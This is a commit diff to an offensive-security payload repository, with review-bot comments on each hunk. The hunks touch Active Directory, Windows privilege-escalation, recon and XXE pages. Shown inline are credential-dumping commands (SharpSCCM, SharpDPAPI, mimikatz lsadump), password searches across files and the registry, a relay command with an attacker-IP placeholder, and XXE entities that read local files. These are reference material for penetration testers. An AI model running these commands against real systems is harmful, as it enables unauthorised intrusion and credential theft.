mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-04 23:26:05 +02:00
XXS Public Example + PHP Filter RCE
This commit is contained in:
parent
35ff178624
commit
fe41254fde
File diff suppressed because one or more lines are too long
|
@ -3663,9 +3663,10 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
|
||||||
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
|
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
|
||||||
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
|
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
|
||||||
```
|
```
|
||||||
* Using [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) for SCCM retrieval and decryption
|
* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) or [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
|
||||||
```ps1
|
```ps1
|
||||||
.\SharpDPAPI.exe SCCM
|
.\SharpDPAPI.exe SCCM
|
||||||
|
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
|
||||||
```
|
```
|
||||||
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
|
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
|
||||||
```ps1
|
```ps1
|
||||||
|
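Review bot: the new `.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD` line has no text saying what the `-u`/`-p` placeholders are for, while the bullet above it only says "SCCM retrieval and decryption"; a few words noting that these are the credentials used to request the Network Access Account policy from the management point (as opposed to the local DPAPI decryption SharpDPAPI performs) would keep the two commands from reading as interchangeable. Also, the SharpDPAPI link is pinned to a commit and line range while the added `[Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM)` link points at the repository root; pinning both, or neither, would be consistent.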
@ -4048,4 +4049,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||||
* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
|
* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
|
||||||
* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/)
|
* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/)
|
||||||
* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire)
|
* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire)
|
||||||
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
||||||
|
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
|
||||||
|
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
|
|
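Review bot: the second added reference, `* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)`, lands in the Active Directory references list but nothing in this diff ties it to an AD technique; either cite it from the section it supports or move it to the deserialization page's references. The `@_xpn_` SCCM link does match the SharpDPAPI/SharpSCCM addition above. Minor: the author/date order differs from the neighbouring entries (`- By CHARLIE CLARK July 05, 2022` versus `- April 2, 2019 by znlive`).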
@ -41,6 +41,8 @@
|
||||||
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
|
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
|
||||||
```
|
```
|
||||||
|
|
||||||
|
* Perform Google Dorks search
|
||||||
|
|
||||||
|
|
||||||
## Active recon
|
## Active recon
|
||||||
|
|
||||||
|
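Review bot: the added `* Perform Google Dorks search` item is the only entry in this passive-recon list without a tool, reference or example, whereas the `gitrob analyze ...` line above it shows a full command; link a dork reference or name the search operators to use (site:, filetype:, inurl:) so the reader has something concrete to start from.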
@ -74,7 +76,7 @@
|
||||||
|
|
||||||
### Web discovery
|
### Web discovery
|
||||||
|
|
||||||
* Locate `robots.txt` file
|
* Locate `robots.txt`, `security.txt`, `sitemap.xml` files
|
||||||
* Retrieve comments in source code
|
* Retrieve comments in source code
|
||||||
* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls)
|
* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls)
|
||||||
* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner)
|
* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner)
|
||||||
|
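Review bot: the expanded `* Locate `robots.txt`, `security.txt`, `sitemap.xml` files` entry should mention that `security.txt` is served from `/.well-known/security.txt` (RFC 9116), since a reader checking only the web root will miss it. While touching this list, the unchanged context line `[tomnomnom/waybackurls](github.com/tomnomnom/waybackurls)` lacks the `https://` scheme and renders as a relative link.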
@ -109,7 +111,10 @@
|
||||||
|
|
||||||
## Looking for Web vulnerabilities
|
## Looking for Web vulnerabilities
|
||||||
|
|
||||||
* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, ....
|
* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, Cookies, ....
|
||||||
|
* Test for Business Logic weaknesses
|
||||||
|
* High or negative numerical values
|
||||||
|
* Try all the features and click all the buttons
|
||||||
* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html
|
* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html
|
||||||
|
|
||||||
* Subscribe to the site and pay for the additional functionality to test
|
* Subscribe to the site and pay for the additional functionality to test
|
||||||
|
|
|
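Review bot: the three new bullets are all at the same level, but `* High or negative numerical values` is an example of `* Test for Business Logic weaknesses` rather than a separate task; indent it under that item (a link to the repository's own business-logic page would fit there too). `* Try all the features and click all the buttons` is general advice that reads better as the first item of the section than wedged between the business-logic bullet and the checklist link.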
@ -14,8 +14,8 @@
|
||||||
* [Default Writeable Folders](#default-writeable-folders)
|
* [Default Writeable Folders](#default-writeable-folders)
|
||||||
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
||||||
* [SAM and SYSTEM files](#sam-and-system-files)
|
* [SAM and SYSTEM files](#sam-and-system-files)
|
||||||
* [LAPS Settings](#laps-settings)
|
|
||||||
* [HiveNightmare](#hivenightmare)
|
* [HiveNightmare](#hivenightmare)
|
||||||
|
* [LAPS Settings](#laps-settings)
|
||||||
* [Search for file contents](#search-for-file-contents)
|
* [Search for file contents](#search-for-file-contents)
|
||||||
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
|
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
|
||||||
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
|
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
|
||||||
|
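Review bot: moving `* [LAPS Settings](#laps-settings)` from before `HiveNightmare` to after it matches the section move in the body of the file, and the `#laps-settings` anchor is unchanged, so existing deep links keep working; nothing else to flag in this hunk.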
@ -405,15 +405,6 @@ samdump2 SYSTEM SAM -o sam.txt
|
||||||
|
|
||||||
Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash.
|
Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash.
|
||||||
|
|
||||||
### LAPS Settings
|
|
||||||
|
|
||||||
Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
|
|
||||||
|
|
||||||
* LAPS Enabled: AdmPwdEnabled
|
|
||||||
* LAPS Admin Account Name: AdminAccountName
|
|
||||||
* LAPS Password Complexity: PasswordComplexity
|
|
||||||
* LAPS Password Length: PasswordLength
|
|
||||||
* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
|
|
||||||
|
|
||||||
### HiveNightmare
|
### HiveNightmare
|
||||||
|
|
||||||
|
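Review bot: this hunk only removes the `### LAPS Settings` block (header, the `Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd`` sentence and the five `* LAPS ...: ...` bullets); the same lines reappear verbatim after `### HiveNightmare` in the following hunk, so it is a pure move with no content lost. Since the commit message does not mention the reorder, a one-line note in the description would help anyone reading the history.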
@ -443,6 +434,16 @@ mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\W
|
||||||
mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
|
mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### LAPS Settings
|
||||||
|
|
||||||
|
Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
|
||||||
|
|
||||||
|
* LAPS Enabled: AdmPwdEnabled
|
||||||
|
* LAPS Admin Account Name: AdminAccountName
|
||||||
|
* LAPS Password Complexity: PasswordComplexity
|
||||||
|
* LAPS Password Length: PasswordLength
|
||||||
|
* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
|
||||||
|
|
||||||
|
|
||||||
### Search for file contents
|
### Search for file contents
|
||||||
|
|
||||||
|
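Review bot: the relocated `### LAPS Settings` section is the only subsection around here without a command block; since the text tells the reader to extract the key, add the query in the page's `ps1` style (for example `reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd"`) beside the bullets. Two clarifications would also help under a "Looting for passwords" heading: these values (`AdmPwdEnabled`, `AdminAccountName`, `PasswordComplexity`, `PasswordLength`, `PwdExpirationProtectionEnabled`) are the policy settings of legacy Microsoft LAPS, not the managed password itself, which lives in Active Directory; and the newer built-in Windows LAPS stores its policy under a different registry location, so an absent `AdmPwd` key does not mean LAPS is not deployed.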
@ -452,6 +453,10 @@ findstr /si password *.xml *.ini *.txt *.config
|
||||||
findstr /spin "password" *.*
|
findstr /spin "password" *.*
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Also search in remote places such as SMB Shares and SharePoint.
|
||||||
|
* Search passwords in SharePoint: [nheiniger/SnaffPoint](https://github.com/nheiniger/SnaffPoint)
|
||||||
|
* Search passwords in SMB Shares: [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler)
|
||||||
|
|
||||||
### Search for a file with a certain filename
|
### Search for a file with a certain filename
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
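Review bot: the added `Also search in remote places such as SMB Shares and SharePoint.` paragraph and the SnaffPoint/Snaffler bullets sit under `### Search for file contents`, which until now covered only local `findstr` searches on this Windows privilege-escalation page; consider a short sub-heading (or a pointer to the Active Directory page, where share enumeration already lives) and state that both tools need network reachability and domain credentials, unlike the local commands above them. Minor: `SMB Shares` should be `SMB shares`.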
@ -477,12 +482,6 @@ reg query HKLM /f password /t REG_SZ /s
|
||||||
reg query HKCU /f password /t REG_SZ /s
|
reg query HKCU /f password /t REG_SZ /s
|
||||||
```
|
```
|
||||||
|
|
||||||
### Read a value of a certain sub key
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
|
||||||
```
|
|
||||||
|
|
||||||
### Passwords in unattend.xml
|
### Passwords in unattend.xml
|
||||||
|
|
||||||
Location of the unattend.xml files.
|
Location of the unattend.xml files.
|
||||||
|
|
|
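Review bot: removing `### Read a value of a certain sub key` drops the only example of querying a single value with `/V` (`REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList`), and neither the hunk nor the commit message says why. If the FTH example was judged irrelevant to password looting, keep the `/V` form under `### Search the registry for key names and passwords` with a relevant value rather than deleting the technique entirely.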
@ -139,11 +139,9 @@ We try to display the content of the file `/etc/passwd`
|
||||||
|
|
||||||
:warning: `SYSTEM` and `PUBLIC` are almost synonym.
|
:warning: `SYSTEM` and `PUBLIC` are almost synonym.
|
||||||
|
|
||||||
```xml
|
```ps1
|
||||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
<!ENTITY % xxe PUBLIC "Random Text" "URL">
|
||||||
<!DOCTYPE foo [
|
<!ENTITY xxe PUBLIC "Any TEXT" "URL">
|
||||||
<!ELEMENT foo ANY >
|
|
||||||
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### Classic XXE Base64 encoded
|
### Classic XXE Base64 encoded
|
||||||
|
|
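Review bot: the fence tag changes from ```` ```xml ```` to ```` ```ps1 ```` although the content is still a DTD/XML fragment; keep `xml` so it highlights correctly. The replacement also trades a complete, parseable document (`<!DOCTYPE foo [ ... <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>`) for two bare declarations, `<!ENTITY % xxe PUBLIC "Random Text" "URL">` (a parameter entity) and `<!ENTITY xxe PUBLIC "Any TEXT" "URL">` (a general entity), with no `DOCTYPE` wrapper and no `&xxe;` reference, so the snippet no longer shows how the `PUBLIC` form is used; wrap one of them in the DOCTYPE from the previous version and use a single public-identifier placeholder instead of both "Random Text" and "Any TEXT". The unchanged context line `:warning: `SYSTEM` and `PUBLIC` are almost synonym.` should read "synonyms".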